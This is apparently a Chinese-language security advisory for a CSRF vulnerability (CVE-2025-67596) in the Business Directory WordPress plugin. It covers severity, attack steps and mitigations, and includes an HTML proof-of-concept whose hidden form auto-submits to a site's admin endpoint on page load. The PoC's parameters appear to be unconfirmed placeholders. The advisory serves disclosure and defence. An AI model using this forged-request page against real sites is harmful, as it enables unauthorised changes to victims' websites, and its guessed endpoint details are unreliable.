CVE-2025-67596: WordPress Business Directory插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-67596

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Strategy11 Team Business Directory (business-directory-plugin)

漏洞概述

CVE-2025-67596是WordPress平台下Strategy11 Team开发的Business Directory插件中的一个跨站请求伪造（CSRF）安全漏洞。该漏洞存在于插件的6.4.19及以下所有版本中，攻击者可利用此漏洞诱导已登录的管理员或用户在不知情的情况下执行非预期的操作。由于该插件通常用于创建和管理商业目录网站，包含企业信息、联系方式等敏感数据，一旦被恶意利用可能导致目录内容被篡改、用户权限被提升或敏感信息泄露等严重后果。CVSS评分为4.3，属于中等严重程度，攻击复杂度低但需要用户交互，攻击者需要诱骗目标用户访问恶意页面或点击恶意链接。此漏洞由Patchstack安全团队的审计人员发现并报告，披露日期为2025年12月9日。建议所有使用该插件的用户立即升级到最新版本以修复此安全问题。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证会话的攻击方式。在Business Directory插件中，攻击者可以构造恶意HTML页面或链接，当已登录的管理员或用户访问时，浏览器会自动携带有效的会话Cookie向目标网站发送请求。攻击者利用插件中缺少或不足的CSRF令牌验证机制，使得这些请求被服务器误认为是合法的用户操作。攻击者可以诱导管理员执行诸如修改插件设置、添加或删除目录条目、更改用户权限等敏感操作。由于WordPress的管理员通常具有较高的系统权限，成功的CSRF攻击可能导致整个网站被攻击者控制。漏洞的利用条件包括：目标用户必须已登录到WordPress后台且会话有效，攻击者需要诱使用户访问恶意页面，以及插件的某些管理功能缺少CSRF token验证。攻击者通常会使用社交工程手段，如钓鱼邮件或恶意链接，来提高攻击成功率。

攻击链分析

STEP 1

步骤1：侦察阶段

攻击者收集目标网站信息，确认其使用Business Directory插件及其版本号（<=6.4.19），并识别插件中缺少CSRF保护的功能端点。

STEP 2

步骤2：构造恶意页面

攻击者创建包含恶意表单或自动执行请求的HTML页面，表单指向插件的管理接口，使用POST或GET方法提交精心构造的参数。

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、恶意链接、社交媒体或其他渠道诱骗目标管理员或用户访问恶意页面。攻击成功率取决于目标用户的安全意识。

STEP 4

步骤4：自动请求执行

当目标用户访问恶意页面时，浏览器自动携带有效的Cookie向目标网站发送请求，由于缺少CSRF验证，服务器将请求视为合法操作。

STEP 5

步骤5：敏感操作执行

攻击者的请求在用户会话上下文中执行，可能导致目录设置被修改、敏感数据被窃取或篡改、用户权限被提升等后果。

STEP 6

步骤6：持久化控制

如果攻击者获得管理员权限，可能进一步植入后门、创建恶意管理员账户或完全控制整个WordPress网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-67596 -->
<!-- This PoC demonstrates a CSRF attack on Business Directory plugin -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-67596</title>
</head>
<body>
    <h1>CSRF PoC for Business Directory Plugin</h1>
    <p>Click the button below to see the CSRF attack in action.</p>
    
    <!-- Malicious form that auto-submits -->
    <form id="csrfForm" action="[TARGET_SITE]/wp-admin/admin.php" method="POST" style="display:none;">
        <!-- Replace with actual vulnerable action -->
        <input type="hidden" name="page" value="business-directory-admin">
        <input type="hidden" name="action" value="bd_save_settings">
        <input type="hidden" name="csrf_token" value="">
        <input type="hidden" name="directory_options" value="malicious_data">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this message, the attack failed.</p>
    <button onclick="alert('Form submitted!')">Manual Submit</button>
</body>
</html>

<!-- Alternative: Image-based CSRF trigger (no user interaction) -->
<!-- <img src="[TARGET_SITE]/wp-admin/admin.php?page=business-directory-admin&action=bd_save_settings" style="display:none;"> -->

影响范围

Business Directory Plugin <= 6.4.19

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）暂时禁用Business Directory插件的admin功能或限制其访问权限；2）启用WordPress的日志记录功能，监控异常的管理操作；3）使用Web应用防火墙（WAF）规则阻止可疑请求；4）要求管理员在完成敏感操作后登出并清除浏览器会话；5）限制允许访问WordPress管理后台的IP地址范围；6）使用双因素认证增强管理员账户安全性。这些措施可以降低被CSRF攻击的风险，但无法完全替代升级到安全版本。